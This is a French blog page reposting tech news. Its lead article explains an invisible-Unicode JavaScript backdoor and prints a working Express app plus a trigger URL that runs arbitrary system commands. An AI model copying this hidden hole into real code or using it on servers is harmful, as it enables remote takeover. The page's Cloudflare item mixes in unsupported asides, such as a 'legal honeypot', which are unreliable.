Une backdoor invisible en JavaScript

@Korben  —  8 janvier 2022

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

 

REF.:   https://korben.info/backdoor-invisible-javascript.html

 

Decentraleyes,un add-on de Firefox ,Chrome,contre le pîstage:

Decentraleyes par Thomas Rientjes

Recommandé

Protège du pistage lié aux diffuseurs de contenus « gratuits », centralisés. Accélère de nombreuses requêtes (Google Hosted Libraries et autres) en les servant localement, allégeant la charge des sites. Complète les bloqueurs de contenus habituels.

 Les sites web dépendent de plus en plus de bibliothèques tierces pour proposer du contenu. En général, annuler les requêtes pour les publicités ou traqueurs ne pose pas de problèmes. Cependant, bloquer le véritable contenu casse évidemment les pages. L'objectif de cet add-on est de supprimer l'intermédiaire en proposant à la vitesse de l'éclair la livraison de fichiers (regroupés) en local afin d'améliorer la protection des données personnelles en ligne.

     • Protège la confidentialité en contournant les diffuseurs de contenus prétendant offrir des services gratuits.
     • Complète les bloqueurs connus tels que uBlock origin (recommandé), Adblock Plus et autres.
     • Fonctionne directement tel quel ne nécessitant aucune configuration préalable.

Remarque: Decentraleyes n'est pas une panacée mais il empêche de nombreux sites de vous contraindre à l'envoi de telles requêtes. Il est possible aussi d'indiquer à Decentraleyes de bloquer les requêtes manquantes.

   > Présentation plus simple: https://git.synz.io/Synzvato/decentraleyes/wikis/Simple-Introduction

Suis-je actuellement protégé ?

Un vérificateur indique si vous êtes correctement protégé. C'est la méthode conseillée et la plus rapide pour savoir si l'add-on est installé, activé et correctement configuré.

   > Lien vers ce vérificateur: https://decentraleyes.org/test

 Adguard,pour ceux qui le connaisse, ne bloque pas le CDN. Vous aurez peut-être besoin de l'extension Decentraleyes dans le navigateur Firefox et la boutique en ligne Chrome pour bloquer le CDN. Decentraleyes pour le navigateur Firefox par Thomas Rientjes Recommandé Vous protège contre le traçage grâce à la livraison de contenu "gratuit" et centralisé. Il empêche de nombreuses demandes d'atteindre des réseaux tels que les bibliothèques hébergées par Google et sert des fichiers locaux pour empêcher les sites de se briser. Complète les bloqueurs de contenu habituels. Protège la confidentialité en évitant les grands réseaux de distribution qui prétendent offrir des services gratuits. • Complète les bloqueurs réguliers tels que uBlock Origin (recommandé), Adblock Plus, et al. • Fonctionne directement hors de la boîte ; absolument aucune configuration préalable requise. Remarque : Decentraleyes n'est pas une solution miracle, mais cela empêche de nombreux sites Web de vous faire envoyer ce genre de demandes. En fin de compte, vous pouvez également faire en sorte que Decentraleyes bloque les demandes pour toutes les ressources CDN manquantes.

REF.:   https://addons.mozilla.org/fr/firefox/addon/decentraleyes/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search

https://chrome.google.com/webstore/detail/decentraleyes/ldpochfccmkkmhdbclfhpagapcfdljkj

Cloudflare fait appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs» ....Hackers :

 

Cloudflare fait  appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs» ....Hackers :

 Des assignations à comparaître ciblant plus de 35 000 noms de domaine de clients Cloudflare en six mois,du déja vu ;-) 

 

Alors beaucoup de nerds emploi d'autres outils pour y parvenir,comme:

 https://www.robtex.com/

 https://urlscan.io/

 https://ipsnoop.com/34.147.109.202 (exemple)

Ces outils vont vous révéler sur quel sites le hackers a enregistrés son site web frauduleux, souvent le site disparaît assez vites  ;-)

 

 Cloudflare ne supprime rien en réponse aux avis de retrait DMCA, à moins qu'il ne stocke le contenu de manière permanente sur son réseau. 

Cependant, la société remettra les données personnelles des clients aux titulaires de droits d'auteur qui obtiennent une citation à comparaître DMCA. Au cours du premier semestre 2021, des citations à comparaître civiles ont ciblé des centaines de clients liés à plus de 35 000 domaines. 

 logo cloudflare

 Service de protection CDN et DDoS populaire Cloudflare a subi de nombreuses pressions de la part des titulaires de droits d'auteur ces dernières années. L'entreprise propose ses services à des millions de sites. Cela inclut les multinationales, les gouvernements, mais aussi certains des principaux sites pirates au monde. Tous les titulaires de droits ne sont pas satisfaits de ce dernier.

 Certains ont accusé Cloudflare de faciliter la violation du droit d'auteur en continuant à fournir l'accès à ces plateformes. Dans le même temps, ils font appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs». Cloudflare voit les choses différemment. 

L'entreprise se positionne comme un fournisseur de services neutre qui n'héberge aucun contenu illicite. Ils ne font que transmettre des informations qui sont temporairement mises en cache sur ses services.(souvent des faussetés). 

Demandes de suppression et de blocage

 Auparavant, les tribunaux avaient ordonné à Cloudflare de bloquer des sites spécifiques, mais aucune nouvelle ordonnance n'est intervenue au cours du premier semestre de l'année dernière(sinon Cloudflare serait en faillite car il coopère aux piéage des hackers avec les services de l'états,un Honeypot légal ). La société a répondu à plusieurs demandes de retrait DMCA. Dans ces cas, le contenu signalé est stocké sur le réseau de Cloudflare. Ces demandes régulières de retrait DMCA ont ciblé 32 comptes et 367 noms de domaine au cours de la période de référence. Il s'agit d'une augmentation significative par rapport à l'année précédente où 4 comptes et 4 noms de domaine avaient été impactés. Domaines ciblés par des avis DMCA réguliers dmca Outre les problèmes de droits d'auteur, Cloudflare répond également à d'autres demandes d'application, notamment les ordres de piégeage et de commerce et les mandats de perquisition(c'est là où est situé la cryptomonnaie,les attaques XSS,les malwares,etc...). Ceux-ci ont également augmenté au fil des ans. 

Ces augmentations ne sont pas vraiment inattendues car Cloudflare a considérablement développé son activité, explique la société. « Bien qu'il y ait eu une augmentation constante du nombre de demandes d'application de la loi depuis notre premier rapport de transparence en 2013, cela est dû en partie à l'augmentation exponentielle du nombre de domaines clients Cloudflare au cours de cette période. » 

Une copie du rapport de transparence complet de Cloudflare est disponible sur le site officiel de la société.(mais c'est seulement du papier sans volonté)

 

Nota: Un CDN c'est, un réseau de diffusion de contenu (RDC) ou en anglais content delivery network (CDN) est constitué d’ordinateurs reliés en réseau à travers Internet et qui coopèrent afin de mettre à disposition du contenu ou des données à des utilisateurs.

Ce réseau est constitué :

• de serveurs d'origine, d'où les contenus sont « injectés » dans le RDC pour y être répliqués ;
• de serveurs périphériques, typiquement déployés à plusieurs endroits géographiquement distincts, où les contenus des serveurs d'origine sont répliqués ;
• d'un mécanisme de routage permettant à une requête utilisateur sur un contenu d'être servie par le serveur le « plus proche », dans le but d’optimiser le mécanisme de transmission / livraison.

Les serveurs (ou nœuds) sont généralement connectés à Internet à travers différentes dorsales Internet.

L’optimisation peut se traduire par la réduction des coûts de bande passante, l’amélioration de l’expérience utilisateur (réduction de la latence), voire les deux.

Le nombre de nœuds et de serveurs qui constituent un RDC varie selon les choix d’architecture, certains pouvant atteindre plusieurs milliers de nœuds et des dizaines de milliers de serveurs.

REF.:   https://torrentfreak.com/subpoenas-targeted-over-35000-cloudflare-customer-domain-names-in-six-months-220109/

 

 

Windows 11 : l'invite de commandes va tirer sa révérence en 2022

Fanny Dufour

16 décembre 2021 à 13h27

À partir de 2022, Microsoft remplacera peu à peu l'invite de commandes actuelle par le Windows Terminal comme console par défaut sur Windows 11 .

Il est déjà possible de choisir le Windows Terminal comme terminal par défaut dans ses paramètres sur Windows 11.

Un changement qui prendra place en 2022

Depuis longtemps, Windows utilise comme terminal par défaut le Windows Console Host, qui se fait vieillissant. Sentant qu'il était temps que l'expérience soit améliorée, l'entreprise a annoncé en 2019 et rendu disponible pour tous en 2020 le Windows Terminal, une version repensée et plus moderne de l'antédiluvienne console. S'il est déjà possible de le télécharger et de l'utiliser sur Windows 10 et 11, l'ancienne invite de commandes reste pour le moment l'application utilisée par défaut.

Ce ne sera bientôt plus le cas, en tout cas sur Windows 11, puisque l'entreprise a annoncé vouloir faire du Windows Terminal le terminal par défaut à partir de 2022. Les participants au programme Windows Insider seront les premiers à en profiter et le déploiement se fera progressivement, jusqu'à ce que tous les utilisateurs de Windows 11 bénéficient du changement.

Un terminal amélioré

Pour rappel, le Windows Terminal vient avec de nombreuses améliorations par rapport au terminal actuel, comme un moteur de rendu de texte accéléré par GPU, un affichage multi-onglets, des volets et une prise en charge des caractères Unicode et UTF-8. Il possède également de nombreuses options de personnalisation, aussi bien pour les raccourcis que pour le thème. Il peut exécuter toute application dotée d'une interface en ligne de commande et donne la possibilité de créer des profils pour chacune d'entre elles.

Pour les plus impatients des utilisateurs de Windows 11, il est déjà possible d'aller dans les paramètres pour désigner le Windows Terminal comme programme par défaut pour ouvrir toutes les applications en lignes de commandes.

Source : Tom's Hardware

 

REF.:   https://www.clubic.com/pro/entreprises/microsoft/actualite-399192-windows-11-l-invite-de-commandes-va-tirer-sa-reverence-en-2022.html?_ope=eyJndWlkIjoiNzM2OGQyYTA1M2UxYjUzYTEzZDE0MDAzYWQ0Yzg1YWMifQ%3D%3D

 

 

Des appareils ne gérant que le HDMI 2.0 rebadgé en HDMI 2.1, c'est autorisé : attention à ne pas vous faire piéger

Benjamin Destrebecq

18 décembre 2021 à 10h30

 

Sans que l'on ne comprenne pourquoi, l'administration des licences HDMI accepte que les constructeurs mentent sur la norme HDMI 2.1 .

Affichés HDMI 2.1, les moniteurs peuvent tout à fait ne proposer qu'une compatibilité HDMI 2.0 et donc… tromper les acheteurs.

N'est pas 2.1 qui veut

Annoncée en novembre 2017, la norme HDMI 2.1 n'est finalement arrivée aux yeux du très grand public qu'avec la sortie des consoles de salon nouvelle génération, les PlayStation 5 et Xbox Series X . Capables de bien des choses comparées à leurs grandes soeurs, ces deux machines sont arrivées en demandant une compatibilité HDMI 2.1 pour certaines fonctionnalités.

C'est par exemple le cas des jeux pouvant fonctionner en 4K à 120 images par seconde. Un tel flux n'est pas gérable par l'ancienne norme HDMI 2.0, qui ne pourra supporter que du 1080p à 120 images par seconde, ou de la 4K à 60 images par seconde. Quelque chose de tout à fait acceptable, mais de différent. De même, le VRR (taux de rafraîchissement variable) ne peut pas être supporté par un téléviseur ne disposant que de ports HDMI 2.0.

Une réglementation difficile à comprendre

C'est donc là tout le problème : si un téléviseur HDMI 2.0 est vendu en tant que HDMI 2.1, l'acheteuse ou l'acheteur ne pourra pas profiter de certaines fonctionnalités sans nul doute désirées lors de l'achat. Par rapport à cela, l'administration des licences HDMI explique de façon assez floue que les fonctionnalités propres au 2.1 sont « totalement facultatives » et qu'il appartient aux constructeurs de préciser la liste de celles prises en charge par l'écran. Il incombera ensuite aux consommateurs de consulter ladite liste afin de vérifier si elle correspond dans son intégralité à ce qu'on attend de la norme 2.1.

Il peut être compréhensible pour l'administration de vouloir homogénéiser les normes HDMI pour ne pas se retrouver avec des hésitations quant à, par exemple, le simple achat d'un câble. En outre, un câble HDMI 2.1 peut se connecter à un téléviseur 2.0 et inversement, il ne sera simplement pas possible de profiter de toutes les fonctionnalités selon la compatibilité.

Mais l'autorisation donnée pour l'affichage d'une norme HDMI 2.1 fantôme risque de porter à confusion bien des personnes, qui penseront pouvoir profiter au maximum de leur nouveau téléviseur et de leur nouvelle console, sans que ce ne soit finalement le cas.

Source : Wcctech

 

REF.:   https://www.clubic.com/television-tv/televiseur/actualite-399498-des-appareils-ne-gerant-que-le-hdmi-2-0-rebadge-en-hdmi-2-1-c-est-autorise-attention-a-ne-pas-vous-faire-pieger.html